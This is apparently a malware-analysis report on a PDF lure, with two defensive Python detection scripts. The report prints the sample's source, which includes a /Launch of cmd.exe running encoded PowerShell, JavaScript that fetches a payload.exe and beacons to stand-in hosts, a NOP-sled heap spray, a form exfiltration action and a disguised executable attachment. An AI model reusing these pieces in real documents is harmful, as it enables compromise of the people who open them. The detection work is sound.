Verdict: MALICIOUS
Risk score: 546

Machine learning
- Nyx PDF Classifier malicious score: 1.0000

Heuristics (15 findings)
- Launch action (critical) [PDF_LAUNCH]: PDF contains a /Launch action whose target is an executable, URL, or UNC path; it can start an external application.
- /Launch action target: cmd.exe (critical) [PDF_LAUNCH_COMMAND]: PDF /Launch action specifies an executable target with parameters '/c powershell -enc SQBFAFgA...', referencing a known-dangerous executable (cmd, PowerShell, etc.). Adobe Reader and Acrobat have refused /Launch to executables by default since 9.3.3 and prompt before other Launch targets, so this chain relies on a permissive viewer or on the user clicking through.
- JavaScript action (low; 3 related findings) [PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) [PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: var s = this.getURL('https://evil-dropper.example.cn/beacon'); eval(unescape('%76%61%72%20%78%3d%31')); endstream
- Embedded JS stream (low) [PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript issues an HTTP request on open (low) [PDF_JS_NETWORK_BEACON]: Embedded JavaScript calls a network API (this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP), typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming that the recipient opened the file, or fetching a next stage).
  Matched line in script: app.launchURL(url, true); var s = this.getURL('https://evil-dropper.example.cn/beacon'); eval(unescape('%76%61%72%20%78%3d%31'));
- Embedded script payload in PDF stream (high) [PDF_EMBEDDED_SCRIPT_PAYLOAD]: PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
- /Launch action paired with attachment-dropping JS API (high) [PDF_LAUNCH_PLUS_DROPPER_JS]: PDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource, the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
- Generic recovered JavaScript exploit stage (high) [PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- LOLBin token sequence in document text (high) [SE_LOLBIN_RUN_COMMAND]: Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Suspicious extracted artifact (high) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- SubmitForm action (medium) [PDF_SUBMITFORM]: PDF has a /SubmitForm action; form data can be silently posted to an attacker-controlled URL.
- Embedded file (low) [PDF_EMBEDDED]: PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
- External URI (info) [PDF_URI]: PDF contains an external URL action.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://evil-dropper.example.cn/beacon (referenced by PDF JavaScript)
  - http://exfil-server.example.io/collect (referenced by PDF JavaScript)
  - https://fake-update.example.top/update.bin (referenced by PDF JavaScript)
  - http://malware-cdn.example.ru/stage2/payload.exe (referenced by PDF JavaScript)
  - http://185.220.101.45:4444/gate.php (referenced by PDF JavaScript)
  - http://awr-d.xml.usae/ala.x (referenced by PDF JavaScript)
  - http://exfil-server.e (referenced by PDF JavaScript)
  - http://phishing-login.example.org/verify (referenced by PDF JavaScript)
  - http://malicious-site.example.net/click?id=4571 (referenced by PDF JavaScript)
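The structural findings above (PDF_LAUNCH, PDF_LAUNCH_COMMAND, PDF_JAVASCRIPT, PDF_SUBMITFORM, PDF_URI, PDF_EMBEDDED and the actual_type=PE mismatch reported for the attachment) can be reproduced with a small object walker. The following Python script is an added example written for this page, not code from the analyzer whose output is shown. It assumes a flat PDF with uncompressed objects, like the one dumped later in this report; SAMPLE_PDF is a constructed, cut-down copy of that dump rather than the original sample, and the DANGEROUS_EXE list, the MAGIC table, the severity strings and the PDF_AUTO_ACTION label are this example's own choices. A production scanner additionally has to inflate FlateDecode streams and unpack object streams before regexes like these see anything.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a cut-down copy of the PDF dumped in this report, NOT the original file.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WC 5 0 R >> >>
endobj
4 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 28 >>
stream
MZ\x90\x00\x03FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*(.*?)\s*endobj", re.S)
STREAM_RE = re.compile(rb"\bstream\r?\n(.*?)\r?\nendstream", re.S)
# Launch targets treated as known-dangerous (this example's own list, not the analyzer's).
DANGEROUS_EXE = {"cmd.exe", "cmd", "powershell.exe", "powershell", "mshta.exe", "rundll32.exe",
                 "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
MAGIC = [(b"MZ", "PE"), (b"%PDF", "PDF"), (b"PK\x03\x04", "ZIP/OOXML"), (b"\xd0\xcf\x11\xe0", "OLE2")]

def parse_objects(data: bytes) -> Dict[int, Tuple[bytes, bytes]]:
    """Flat PDF -> {object number: (dictionary bytes, raw stream bytes or b'')}."""
    objs = {}
    for m in OBJ_RE.finditer(data):
        body = m.group(2)
        s = STREAM_RE.search(body)
        objs[int(m.group(1))] = (body[:s.start()] if s else body, s.group(1) if s else b"")
    return objs

def literal(d: bytes, key: bytes) -> str:
    """The (...) string literal that follows /key in a dictionary, or '' when absent."""
    m = re.search(rb"/" + key + rb"\s*\((.*?)\)", d, re.S)
    return m.group(1).decode("latin-1") if m else ""

def sniff(blob: bytes) -> str:
    """Classify a stream by magic bytes, ignoring whatever name or /Subtype it was given."""
    return next((name for magic, name in MAGIC if blob.startswith(magic)), "unknown")

def triage(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (rule, severity, detail) findings for the action and attachment surfaces."""
    objs = parse_objects(data)
    # /Filespec objects carry the display name attached to each EmbeddedFile stream.
    names = {}
    for d, _ in objs.values():
        m = re.search(rb"/EF\s*<<\s*/F\s+(\d+)\s+\d+\s+R", d)
        if m:
            names[int(m.group(1))] = literal(d, b"F")
    out = []
    for num, (d, stream) in objs.items():
        if b"/Catalog" in d and (b"/OpenAction" in d or b"/AA" in d):
            out.append(("PDF_AUTO_ACTION", "info", f"obj {num}: /OpenAction or /AA trigger, fires without a click"))
        if re.search(rb"/S\s*/Launch", d):
            target, params = literal(d, b"F"), literal(d, b"P")
            base = target.replace("\\", "/").rsplit("/", 1)[-1].lower()
            rule = "PDF_LAUNCH_COMMAND" if base in DANGEROUS_EXE else "PDF_LAUNCH"
            out.append((rule, "critical", f"obj {num}: /Launch target={target!r} params={params!r}"))
        if re.search(rb"/S\s*/JavaScript", d):
            out.append(("PDF_JAVASCRIPT", "low", f"obj {num}: /JavaScript action"))
        if re.search(rb"/S\s*/SubmitForm", d):
            out.append(("PDF_SUBMITFORM", "medium", f"obj {num}: form data posted to {literal(d, b'F')}"))
        if re.search(rb"/S\s*/URI", d):
            out.append(("PDF_URI", "info", f"obj {num}: external URL {literal(d, b'URI')}"))
        if b"/EmbeddedFile" in d:
            actual = sniff(stream)  # content decides, not the /Filespec name
            out.append(("PDF_EMBEDDED", "high" if actual == "PE" else "low",
                        f"obj {num}: attachment {names.get(num, '?')!r} actual_type={actual}; "
                        f"declared_or_context_type=PDF; {len(stream)} bytes"))
    return out

if __name__ == "__main__":
    for rule, sev, detail in triage(SAMPLE_PDF):
        print(f"{sev:8} {rule:20} {detail}")
```

Running it prints one line per finding. The check that matters most for this sample is the magic-byte sniff on the EmbeddedFile stream: the attachment is classified as a PE by its MZ header, whatever the /Filespec calls it, which is the same actual_type=PE versus declared_or_context_type=PDF mismatch the report records for invoice_scan.exe.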
Extracted artifacts (7)
Files carved from inside the sample during analysis. ClamAV reported no threats for any of them; the "obfuscation or payload" verdicts come from the static content checks described under EXTRACTED_FILE_STATIC_TRIAGE. Note that the larger /JS stream previews run past the stream's endstream into the objects that follow it (objects 8 to 15, the xref table and the trailer), which is consistent with every URL in the Embedded URL list, including the link-annotation and page-text ones, being labelled as referenced by PDF JavaScript.

invoice_scan.exe
Kind: pdf-embedded-file | Source: PDF EmbeddedFile object 14 at offset 0x7DB | Size: 33 bytes
SHA-256: db48261aa9d79df258f7bcf0422d851f6f16268be63d1dd652b5456485945cb4
Detection: ClamAV found no threats. Obfuscation or payload: likely (actual_type=PE; declared_or_context_type=PDF; filename=invoice_scan.exe; kind=pdf-embedded-file). The stream starts with the MZ marker of a PE image (object 14 in the embedded_pdf_script_00000579.bin preview), so the attachment is an executable carried inside a PDF regardless of the name its /Filespec gives it.
javascript_obj0007_000.js
Kind: pdf-javascript-stream | Source: PDF /JS object 7 at offset 0x21D | Size: 285 bytes
SHA-256: 8b10a89507b45af8c9149c03c9c69ce11f6fa4ca5f4ea229bcfd2821e1e271dc
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 3 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));

javascript_obj0013_001.js
Kind: pdf-javascript-stream | Source: PDF /JS object 13 at offset 0x6C0 | Size: 141 bytes
SHA-256: ae3db073be58322bb7f6cbeeebdb7219b19a50f0e820958a6d223defea8941ca
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
javascript_obj0007_002.js
Kind: pdf-javascript-stream | Source: PDF /JS object 7 at offset 0x23E | Size: 1953 bytes
SHA-256: 82a2141ba0a11a1b5acb87996b6d1a3a43b2586abd4c34df29aafedd610558a0
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 2 shell/COM execution tokens and 4 eval/decoder/string-building tokens). The script lines themselves contain no shell token; the two counted here sit in the /Launch annotation of object 10 (cmd.exe, powershell), which this over-long carve includes after the script.
Preview script (first 1,000 lines of the extracted script):
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
(The remainder of this preview runs past the endstream/endobj of object 7 into objects 8 to 15, the xref table and the trailer, which are shown in full in the embedded_pdf_script_00000579.bin preview below.)
javascript_obj0013_003.js
Kind: pdf-javascript-stream | Source: PDF /JS object 13 at offset 0x6E2 | Size: 765 bytes
SHA-256: 7415c8b268f11d45cb402d944cc18e06814a498c0acfddfc8a74c88ccf04774f
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
(The remainder of this preview runs past the endstream/endobj of object 13 into objects 14 and 15, the xref table and the trailer, which are shown in full in the embedded_pdf_script_00000579.bin preview below.)
embedded_pdf_script_00000579.bin
Kind: pdf-embedded-script | Source: PDF decompressed stream script payload at offset 0x579 | Size: 2525 bytes
SHA-256: 245dbb288d497ba7561712e11bdada70ed38360d6c6434522c48483f1affcad7
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 2 shell/COM execution tokens and 4 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script). This artifact is the complete PDF source and is the best single view of the document's structure: the catalog (object 1) reaches the object 7 script three ways (the /OpenAction reference to object 4, the /Names JavaScript tree entry object 6, and a second inline /OpenAction), and reaches the object 13 script through the document-level additional-actions dictionary (the spec key /WC plus a non-standard /WillClose alias, both pointing at object 5), so both scripts run without any click; objects 9 to 12 hold the link, /Launch and /SubmitForm annotations, and objects 14 and 15 hold the MZ-headed attachment named invoice_scan.exe.
%PDF-1.7
%����
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WillClose 5 0 R /WC 5 0 R >> /Names << /JavaScript << /Names [ (init) 6 0 R ] >> >> /OpenAction << /S /JavaScript /JS 7 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [ 3 0 R ] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 8 0 R /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R ] >>
endobj
4 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
5 0 obj
<< /S /JavaScript /JS 13 0 R >>
endobj
6 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
7 0 obj
<< /Length 320 >>
stream
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application/octet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
generic_stage_recovery_000.js
Kind: deobfuscated-js | Source: generic stage recovery percent-decode from combined JavaScript objects at offset 0x21D | Size: 3119 bytes
SHA-256: 60b94312accdb85fc15e209533233f1328568cfaa8fbb909e25b65ee26c6c504
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 2 shell/COM execution tokens and 9 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script). This is the concatenation of the carved JavaScript objects after percent-decoding; the only line the recovery changes is eval(unescape('%76%61%72%20%78%3d%31')), whose argument decodes to the source text var x=1, while the %u-encoded NOP sled and spray words are left as they are.
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
(The remainder of this preview repeats the trailing objects 8 to 15, the xref table and the trailer, then the object 13 script followed by objects 14 and 15, the xref table and the trailer once more; all of it is shown in full in the embedded_pdf_script_00000579.bin preview above.)
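The JavaScript findings (PDF_JS_EXPLOIT_CLUSTER, PDF_JS_NETWORK_BEACON, PDF_GENERIC_STAGE_RECOVERY, SE_LOLBIN_RUN_COMMAND) and the per-artifact token counts above come down to a few static passes over the carved script: percent-decoding unescape() literals, spotting the %u-encoded NOP sled and the spray loop, counting decoder and shell tokens, collecting URLs, and pairing a LOLBin name with a flag or URL within 220 characters. The following Python script is an added example written for this page, not the analyzer's code. SAMPLE_JS is a constructed copy of the two carved scripts; the token tuples, the ACROBAT_EXPLOIT_APIS set, the LOLBin flag list and the HEAP_SPRAY_LOOP label are this example's own assumptions, and the report's rule names are reused only where the logic here matches their description.

```python
import re
from typing import Dict, List

# Constructed sample: the two JavaScript streams the report carved (objects 7 and 13), concatenated.
SAMPLE_JS = """var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
"""

UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
PCT_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
SLED_RE = re.compile(r"(?:%u(?:9090|0c0c|0d0d)){2,}", re.I)       # NOP / spray landing words
SPRAY_RE = re.compile(r"for\s*\([^)]*\)\s*\{[^}]*?\+=\s*unescape\(", re.S)  # string growth in a loop
URL_RE = re.compile(r"https?://[^\s'\")]+")
# Token classes mirroring the report's per-artifact counts (lists are this example's own).
DECODER_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "atob(", "decodeURIComponent(")
SHELL_TOKENS = ("WScript.Shell", "ActiveXObject", "CreateObject", "powershell", "cmd.exe", "ShellExecute")
NET_APIS = ("this.getURL(", "app.launchURL(", "XMLHttpRequest", "SOAP.", "Net.HTTP")
ACROBAT_EXPLOIT_APIS = ("util.printd(", "util.printf(", "app.viewerVersion", "Collab.",
                        "media.newPlayer(", "spell.customDictionaryOpen(")
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin)\b"
    r".{0,220}?(-enc\b|-encodedcommand|-nop\b|-w\s+hidden|/c\b|\biex\b|downloadstring|https?://)",
    re.I | re.S)

def js_unescape(lit: str) -> str:
    """JavaScript unescape(): %XX -> one byte char, %uXXXX -> one UTF-16 code unit."""
    return PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), lit)

def shellcode_bytes(lit: str) -> bytes:
    """Memory image of a %u-encoded literal: each code unit lands little-endian in the string buffer."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in re.findall(r"%u([0-9a-fA-F]{4})", lit))

def is_ascii_text(s: str) -> bool:
    return all(0x20 <= ord(c) < 0x7F for c in s)

def recover_stage(js: str) -> str:
    """Bounded stage recovery: rewrite unescape('...') literals whose decode is printable ASCII so
    the hidden source becomes readable; non-ASCII decodes (shellcode words) are left encoded."""
    def repl(m):
        dec = js_unescape(m.group(1))
        return f"unescape('{dec}')" if is_ascii_text(dec) else m.group(0)
    return UNESCAPE_RE.sub(repl, js)

def lolbin_run_command(text: str) -> List[str]:
    """Tool name followed within 220 chars by a dangerous flag, verb or URL (SE_LOLBIN_RUN_COMMAND shape)."""
    return [m.group(0) for m in LOLBIN_RE.finditer(text)]

def triage_js(js: str) -> Dict[str, object]:
    stage = recover_stage(js)
    decoded = [js_unescape(lit) for lit in UNESCAPE_RE.findall(js)]
    text_literals = [d for d in decoded if is_ascii_text(d)]
    net = [api for api in NET_APIS if api in js]
    sled = bool(SLED_RE.search(js))
    acro = [api for api in ACROBAT_EXPLOIT_APIS if api in stage]
    findings: List[str] = []
    if net:
        findings.append("PDF_JS_NETWORK_BEACON")
    if any(t in js for t in DECODER_TOKENS[:3]) and (net or sled or acro):
        findings.append("PDF_JS_EXPLOIT_CLUSTER")
    if sled and SPRAY_RE.search(js):
        findings.append("HEAP_SPRAY_LOOP")  # label is this example's own, not a report rule
    if text_literals and (sled or acro):
        findings.append("PDF_GENERIC_STAGE_RECOVERY")
    if lolbin_run_command(js):
        findings.append("SE_LOLBIN_RUN_COMMAND")
    return {
        "findings": findings,
        "decoded_literals": text_literals,
        "eval_decoder_tokens": sum(js.count(t) for t in DECODER_TOKENS),
        "shell_exec_tokens": sum(js.count(t) for t in SHELL_TOKENS),
        "network_apis": net,
        "urls": URL_RE.findall(js),
        "recovered": stage,
    }

if __name__ == "__main__":
    r = triage_js(SAMPLE_JS)
    for k, v in r.items():
        if k != "recovered":
            print(f"{k}: {v}")
    print(r["recovered"])
    print(shellcode_bytes("%u9090%u9090%u4141%u4141"))
```

recover_stage() is what turns eval(unescape('%76%61%72%20%78%3d%31')) into eval(unescape('var x=1')), the form the generic_stage_recovery_000.js artifact shows, and the decoder-token total for the combined scripts comes out at 4 (one eval, three unescape), matching the report's 3 + 1 for the two /JS objects. shellcode_bytes() renders a %u literal the way it sits in memory: '%u9090%u9090' is four 0x90 NOP bytes, not two CJK characters, which is why the recovery leaves non-ASCII decodes encoded instead of pasting them into the source. lolbin_run_command() is meant for extracted document text and /Launch parameters rather than the script; on '/c powershell -enc ...' it fires, on the invoice body text it stays quiet.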